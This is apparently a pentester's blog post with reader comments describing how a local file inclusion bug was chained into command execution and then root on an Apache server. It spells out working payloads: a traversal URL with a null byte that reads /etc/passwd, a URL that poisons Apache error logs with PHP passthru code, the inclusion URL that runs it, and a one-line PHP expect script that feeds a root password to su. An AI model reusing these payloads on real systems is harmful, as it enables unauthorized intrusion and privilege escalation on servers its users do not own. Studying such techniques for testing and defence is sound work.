LFI..Code Exec..Remote Root!

Recently on a pentest i came accross an interesting Local file inclusion vulnerability. On this occassion it was definitely not a RFI and all i could do was include files from local app server.

E.g. http://vulnsite.com?exec=aaa/../../../../../etc/passwd%00aa

returned the /etc/passwd file. The application server was running as ‘apache’ user and it didnt have permissions to read /etc/shadow or to do anything “interesting”.

Code Execution:

There are quite a few nice articles on internet on how one can do code execution from LFI. Essentially, you try to insert php code into certain files and then try to include these files. These files typically are:

Apache access logs
Apache error logs
/proc/self/environ

etc.

On this occassion the ‘apache’ user had access to read the error logs. So, when you access a URI such as:

http://vuln.com/foo%3c%3fphp%20passthru('id')%20%3f%3e

It adds the following line to apache’s error log:

404 file not found foo<?php passthru(‘id’);?>

Now, you can include the error log files and execute the OS code:

http://vulnsite.com?exec=aaa/../../../../../usr/local/apache/logs/error_logs%00a

Getting Root:

On this occasion, i was lucky and i spotted a file which had a clear text root password in it. However, getting root wasnt very easy, as i could not figure out an easy way to provide this root password within the php script. In the end after searching for quite a bit, i found a way to do this in expect with the following 1 line of php script:

<?php passthru('echo -e \'#!/usr/bin/expect -f\nset password [lrange $argv 0 0]; set cmd [lrange $argv 1 1];set timeout -1; spawn su -c "$cmd" ;match_max 100000 ;expect "*?assword:*"; send -- "$password\r"; send -- "\r"; expect eof\'>/tmp/su.exp&/usr/bin/expect /tmp/su.exp passw0rd whoami>>/tmp/out.txt');?>

This script will do the following:
1. create an expect script(/tmp/su.exp) which will take the root (su) password and command to execute as argument.
2. run the expect script with the root password and command to run as root.

Enjoy the root privileges!
P.S: it is quite common to see expect installed on *nix application servers

4 Thoughts on “LFI..Code Exec..Remote Root!

  1. Hi Sid,

    I like your solution because it doesn’t require you to bother getting an interactive shell first.

    Even if you had got an interactive shell first, you would still have faced a similar problem: interactive commands like “su” don’t work without a TTY.

    I’ve discussed a couple of related post-exploitation problems and solutions here:

    http://www.pentestmonkey.net/blog/post-exploitation-without-a-tty/

    http://www.pentestmonkey.net/blog/ssh-with-no-tty/

  2. Good read.

    Wasn’t this how phpbb was hacked :)

  3. apache 2.2 not vulnerable :(

  4. Pingback: Hack all the world - Open Penetration Testing - Focusecurity.Org

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Post Navigation